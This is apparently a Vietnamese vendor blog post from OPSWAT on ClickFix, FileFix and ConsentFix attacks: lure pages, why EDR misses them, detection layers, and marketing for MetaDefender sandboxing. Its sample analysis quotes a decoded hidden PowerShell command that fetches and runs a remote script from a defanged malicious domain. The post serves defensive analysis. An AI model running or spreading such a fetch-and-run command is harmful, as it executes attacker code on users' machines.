Phát hiện và ngăn chặn các cuộc tấn công ClickFix trước khi chúng xâm nhập vào các thiết bị đầu cuối của bạn

Trong vòng khoảng 18 tháng, ClickFix đã chuyển từ một kỹ thuật chuyên biệt thành một phương thức xâm nhập chủ đạo. Hai yếu tố chính đã thúc đẩy sự gia tăng này: việc thương mại hóa trên các diễn đàn ngầm và sự xác nhận từ các thực thể nhà nước.

Các bộ công cụ ClickFix đã xuất hiện trên các diễn đàn ngầm với mức giá dao động từ 200 đến 1.500 USD mỗi tháng. Các bộ công cụ này cung cấp sẵn các mồi nhử có thể tùy chỉnh, hỗ trợ đa ngôn ngữ, khả năng né tránh máy ảo (VM) và vượt qua UAC ngay khi cài đặt. Gói sản phẩm này đã giảm rào cản gia nhập xuống gần như bằng không, cho phép những kẻ tấn công có trình độ kỹ thuật thấp thực hiện các chiến dịch mà trước đây đòi hỏi phải có công cụ tùy chỉnh. Kết quả là khối lượng hoạt động đã tăng mạnh trong các nhóm tội phạm mạng ở mọi cấp độ.

Quá trình lây nhiễm ClickFix bao gồm ba giai đoạn riêng biệt, mỗi giai đoạn đều có cơ hội phát hiện và lỗ hổng riêng.

ClickFix không phụ thuộc vào kênh phân phối cụ thể. Trong một chiến dịch duy nhất, TA571 đã phân phối các tệp đính kèm HTML đến hơn 100.000 hộp thư đến. ClearFake đã tấn công hàng loạt các trang web WordPress hợp pháp. Các video TikTok do trí tuệ nhân tạo (AI) tạo ra đã thu hút 500.000 lượt xem để quảng bá các mồi nhử kích hoạt phần mềm giả mạo. Bốn trong năm trang mồi nhử ClickFix bị chặn lại xuất phát từ kết quả tìm kiếm, chứ không phải từ email. Điều này cho thấy quảng cáo độc hại trên Google Tìm kiếm đã trở thành kênh phân phối chủ đạo.

Các trang lừa đảo của ClickFix kết hợp giữa lớp tạo niềm tin và lớp trang đích. Lớp tạo niềm tin mượn uy tín của các thương hiệu thông qua việc giả mạo, bao gồm Booking.com, Cơ quan An sinh Xã hội, Facebook, các cổng VPN của Fortinet và Bộ Quốc phòng Ấn Độ. Lớp trang đích hiển thị một CAPTCHA giả mạo, một thông báo lỗi trình duyệt hoặc một lời nhắc xác minh người dùng. Người dùng tuân theo vì các dấu hiệu trực quan rất quen thuộc, uy tín ngụ ý mang tính chính thức và tính cấp bách được cài cắm sẵn trong lời nhắc.

ClickFix là một bức tranh mà các tác nhân đe dọa liên tục vẽ lại. Khi các chuyên gia bảo mật điều chỉnh chiến lược, những kẻ tấn công lại mở rộng phạm vi tấn công và đẩy cuộc tấn công vào các tầng mới trong môi trường người dùng.

FileFix đã chuyển bề mặt thực thi từ hộp thoại Chạy của Windows sang thanh địa chỉ của File Explorer. File Explorer là công cụ mà người dùng sử dụng hàng ngày, điều này giúp giảm bớt rào cản khi lừa đảo và làm giảm cảm giác nghi ngờ mà hộp thoại Chạy có thể gây ra. FileFix đã xuất hiện trong môi trường thực tế chỉ hai tuần sau khi bản chứng minh khái niệm (PoC) của nó được công bố vào tháng 7 năm 2025.

So sánh nhanh giữa ClickFix và FileFix

ConsentFix chuyển hoàn toàn cuộc tấn công khỏi thiết bị đầu cuối sang lớp nhận dạng. Nạn nhân thực hiện quy trình đăng nhập Microsoft hợp lệ, sau đó dán mã ủy quyền OAuth vào một trang lừa đảo, qua đó cấp cho kẻ tấn công quyền truy cập vào Azure CLI (giao diện dòng lệnh). Do quá trình xác thực này là thật, kỹ thuật này có thể vượt qua các khóa truy cập (passkeys) và xác thực đa yếu tố (MFA) chống lừa đảo.

Một chiến dịch diễn ra vào tháng 12 năm 2025 đã cho thấy sự chuyên nghiệp trong vận hành, bao gồm việc chặn IP đồng bộ trên tất cả các trang web lừa đảo ngay khi mục tiêu hoàn tất việc cấp quyền, qua đó ngăn cản các chuyên gia ứng phó sự cố tái hiện lại quy trình trong quá trình điều tra.

Báo cáo của Microsoft Defender Experts cho biết hàng nghìn thiết bị doanh nghiệp bị xâm nhập hàng ngày do hoạt động của ClickFix, dù hệ thống EDR đang hoạt động. Nguyên nhân của sự cố này nằm ở thiết kế kiến trúc. Hệ thống EDR theo dõi hành vi của các tiến trình, nhưng khi người dùng chính là lớp thực thi, hành động độc hại không thể phân biệt được với hành động hợp pháp của người dùng. Các công cụ quét tĩnh không phát hiện được tệp tin. Các bộ lọc email không phát hiện được tải trọng độc hại. Lỗ hổng này tồn tại do bản chất thiết kế của kỹ thuật này.

Việc phát hiện phải được thực hiện càng sớm càng tốt trong chuỗi bảo mật. Càng phát hiện muộn, chi phí xử lý sự cố càng cao. Ba lớp bảo mật sau đây đều cung cấp các điểm chặn hiệu quả: lớp bảo vệ biên, lớp thiết bị đầu cuối và phân tích tệp trước khi thực thi.

Phát hiện tại biên: Quét các tệp đính kèm email (.eml và .msg), tệp HTML được cung cấp qua web, các liên kết URL nhúng và các tệp PDF chứa các trang ClickFix được liên kết. Mồi nhử càng được phát hiện sớm trong chuỗi phân phối thì càng tốt; lý tưởng nhất là trước khi người dùng tải nó lên.

Endpoint : Giám sát sổ đăng ký RunMRU, giám sát nội dung khay nhớ tạm, các bất thường trong cây quy trình (trình duyệt khởi chạy PowerShell) và ghi nhật ký các khối lệnh PowerShell là những tín hiệu hữu ích nhất để phát hiện các hoạt động đang diễn ra hoặc hỗ trợ công tác điều tra sau khi thực thi.

Sandbox : Kích hoạt các mã HTML, tập lệnh và trình tải đáng ngờ trong một môi trường sandbox dựa trên mô phỏng trước khi chúng tiếp cận người dùng, từ đó trích xuất các chỉ số hành vi (IOC) và các chiến thuật, kỹ thuật và quy trình (TTP) được ánh xạ theo MITRE mà EDR không thể phát hiện được do chưa có quy trình nào được thực thi.

Một mẫu HTML gần đây được phân tích bởi công cụ mô phỏng môi trường ảo MetaDefender đã cho thấy kỹ thuật này đang được áp dụng. Tệp horno-rafelet-es.html (SHA-256 19580e8669c730f634ce986955b23d021d5…) đã bị đánh dấu là “Mối đe dọa đã được xác nhận” trên cả bốn lớp phát hiện.

• Mồi nhử: một trang CAPTCHA giả mạo với tiêu đề "Xác minh bạn là người" sử dụng hình ảnh logo của Google reCAPTCHA

• Nội dung khay nhớ tạm: POWerShell -W h kèm theo lệnh được mã hóa Base64, khi giải mã sẽ thành iex (iwr 'https://amazon-ny-gifts[.]com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content

• Các kỹ thuật MITRE được ghi nhận : T1059.001 PowerShell, T1204 Thực thi bởi người dùng, T1027 Giải mã/Giải mã tệp hoặc thông tin, T1115 Dữ liệu khay nhớ tạm

• Kết luận của OSINT: amazon-ny-gifts[.]com bị OPSWAT đánh dấu OPSWAT LƯỚI ĐỘC HẠI

• Quy trình phát hiện: Hệ thống đánh giá uy tín mối đe dọa đã phát hiện hoạt động đáng ngờ tại URL tạm thời; quá trình mô phỏng trong môi trường sandbox đã ghi nhận hành vi thao túng khay nhớ tạm một cách bí mật và việc khởi chạy PowerShell; điểm đánh giá mối đe dọa được tổng hợp để đưa ra kết luận “Mối đe dọa đã được xác nhận”

Mẫu mã độc này chưa bao giờ phải được thực thi trên một thiết bị đầu cuối thực tế. Chỉ riêng tệp HTML, được phân tích trước khi phát tán, đã cung cấp cho các chuyên gia bảo mật các chỉ số IOC và các hành vi được ánh xạ theo mô hình MITRE cần thiết để chặn đứng chiến dịch này.

MetaDefender là giải pháp phát hiện lỗ hổng zero-day tích hợp OPSWAT, được thiết kế chuyên biệt để phát hiện các mối đe dọa có khả năng lẩn tránh, bao gồm các tải trọng ClickFix, vốn có thể vượt qua các hệ thống quét tĩnh, bộ lọc email và các biện pháp kiểm soát thiết bị đầu cuối. Giải pháp này khắc phục lỗ hổng hệ thống bằng cách phân tích tệp trước khi người dùng nhìn thấy bất kỳ mồi nhử nào.

Quy trình phát hiện bốn tầng

• Đánh giá mức độ nguy hiểm: Mỗi tệp đều được đối chiếu với hơn 50 tỷ chỉ số xâm nhập (IoC) thu thập từ mạng lưới tình báo toàn cầu OPSWAT, giúp phát hiện các mồi nhử và băm tải trọng (payload) đã biết của ClickFix trước khi cần tiến hành phân tích sâu hơn

• Adaptive với mô phỏng cấp lệnh : mô phỏng hành vi của CPU và hệ điều hành trên hơn 50 loại tệp, giúp vượt qua các cơ chế kiểm tra chống máy ảo, bộ đếm thời gian ngủ và nhận dạng dấu vân tay môi trường mà các trình tải ClickFix sử dụng để lách qua các hộp cát truyền thống

• Công cụ đánh giá mức độ đe dọa : kết hợp kết quả từ môi trường sandbox, dữ liệu danh tiếng và các chỉ số hành vi để tạo thành một điểm tin cậy duy nhất cho mỗi tệp, giúp loại bỏ các bước chuyển hướng thủ công vốn làm chậm quá trình phân loại sự cố tại Trung tâm Điều hành An ninh (SOC)

• Tìm kiếm dựa trên độ tương đồng bằng học máy (ML): phân loại các mẫu mới dựa trên các họ phần mềm độc hại và chiến dịch đã biết, phát hiện các biến thể FileFix, ConsentFix và các biến thể ClickFix khác ngay cả khi mã độc đã được nén hoặc che giấu mới đây

Tại sao điều này lại quan trọng đối với ClickFix và các cuộc tấn công tương tự

• Phát hiện các trang HTML lừa đảo, các tập lệnh và trình tải đa giai đoạn mà EDR không thể phát hiện do chưa có quy trình nào được thực thi

• Trích xuất các chỉ số hành vi (IOC) và các chiến thuật, kỹ thuật và quy trình (TTP) được liên kết với khung MITRE ATT&CK mà các đội săn lùng mối đe dọa có thể tận dụng trên các nền tảng SIEM và SOAR

• Cung cấp một kết quả đánh giá duy nhất và tổng hợp cho mỗi tệp với hiệu quả phát hiện lỗ hổng zero-day lên tới 99,9%, giúp loại bỏ việc đối chiếu thủ công vốn làm tốn nhiều thời gian của Trung tâm Điều hành An ninh (SOC)

• Tích hợp vào các quy trình làm việc MetaDefender bao gồm Email Security, MFT chuyển tệp được quản lý), ICAP, Storage Security, Kiosk và Chuyển vùng, để mọi tệp tin khi vào môi trường đều được kiểm tra ngay lập tức

• Có thể triển khai tại chỗ, trên đám mây hoặc dưới dạng một phiên bản MetaDefender SaaS độc lập dành cho các môi trường cách ly mạng và tuân thủ quy định

ClickFix sẽ không biến mất. Khi các biến thể như FileFix và ConsentFix mở rộng diện tích tấn công vượt ra ngoài phạm vi kiểm soát của các biện pháp bảo vệ thiết bị đầu cuối, khoảng trống về mặt cấu trúc ngày càng gia tăng. Để khắc phục điều này, cần có khả năng phát hiện có thể nhận diện tải trọng độc hại trước cả khi người dùng nhìn thấy. Trong khi EDR chỉ ghi nhận hành động của người dùng, MetaDefender lại phát hiện tải trọng độc hại và phân tích nó trước khi quá trình thực thi tiếp cận thiết bị đầu cuối.

Tìm hiểu cách MetaDefender OPSWAT phát hiện các tải trọng ClickFix, các biến thể FileFix và các mối đe dọa zero-day có khả năng lẩn tránh khác trước khi chúng xâm nhập vào các thiết bị đầu cuối của bạn. Hãy trò chuyện với chuyên gia để được hướng dẫn chi tiết về môi trường hệ thống của bạn.